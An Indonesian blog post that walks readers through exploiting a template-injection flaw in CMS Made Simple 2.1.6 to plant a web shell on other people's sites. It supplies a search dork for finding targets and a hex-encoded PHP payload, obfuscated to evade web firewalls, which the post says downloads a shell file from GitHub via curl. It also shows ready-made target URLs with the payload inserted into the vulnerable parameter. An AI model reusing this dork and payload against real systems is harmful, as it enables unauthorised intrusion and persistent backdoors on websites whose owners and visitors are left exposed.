Menu

CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection

CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection

 Hallo ketemu lagi bersama saya .. oke pada pertemuan kali ini kita akan membahas sedikit exploit terbaru yang di temukan pada tanggal 26-10-2020 yang di update di exploit-db dengan CVE-2017-16783 yaitu kerentanan Server-Side Template Injection.


Oke langsung saja bagaimana cara menanam shell pada poc ini?

Dork : inurl:cntnt01detailtemplate

Upload Shell Backdoor

Payload Bypass Waf To Hex:

string:{php}echo `\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x30\x78\x35\x61\x34\x35\x35\x35\x35\x33\x2f\x4d\x41\x52\x49\x4a\x55\x41\x4e\x41\x2f\x6d\x61\x73\x74\x65\x72\x2f\x4d\x41\x52\x49\x4a\x55\x41\x4e\x41\x2e\x70\x68\x70\x20\x3e\x20\x67\x67\x2e\x70\x68\x70`;{/php}

Pada payload di atas saya beri encode hex karna untuk membypass waf pada si websitenya yang asli dari encode hex di atas yaitu Curl linkshell > gg.php


nah pada gambar di atas saya sudah men encode pakai shell marijuana dengan file gg.php ini digunakan untuk memanggil shell nya

cari webiste yang menurut anda vuln 

contoh site :

https://www.target.com/index.php?mact=Products,cntnt01,details,0&cntnt01productid=12&cntnt01detailpage=133&cntnt01detailtemplate=detail_product&cntnt01returnid=133

pada contoh site di atas saya sudah menebalkan paramater taitu cntnt01detailtemplate= yang dimana value dari paramater itu adalah detail_product nah yang harus anda lakukan copy paste payload di atas yang saya beri dan ubah detail_product menjadi sebuah payload ...

https://www.target.com/index.php?mact=Products,cntnt01,details,0&cntnt01productid=12&cntnt01detailpage=133&cntnt01detailtemplate={{PAYLOAD}}&cntnt01returnid=133

Site and Payload

https://www.target.com/index.php?mact=Products,cntnt01,details,0&cntnt01productid=12&cntnt01detailpage=133&cntnt01detailtemplate=string:{php}echo `\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x30\x78\x35\x61\x34\x35\x35\x35\x35\x33\x2f\x4d\x41\x52\x49\x4a\x55\x41\x4e\x41\x2f\x6d\x61\x73\x74\x65\x72\x2f\x4d\x41\x52\x49\x4a\x55\x41\x4e\x41\x2e\x70\x68\x70\x20\x3e\x20\x67\x67\x2e\x70\x68\x70`;{/php}&cntnt01returnid=133

EKSEKUSI SHELL

Jika sudah diberi payload kalian tinggal akses shell di public_html nya contoh

https://target.co.id/gg.php

yap bum! ter upload :D jika not found 404 :v bearti tidak vuln hehehe


kurang lebihnya mohon maaf assalamualaikum wr wb

Video Youtube saya Beri dibawah ini



Iklan Tengah Post

Ads middle content1

Ads middle content2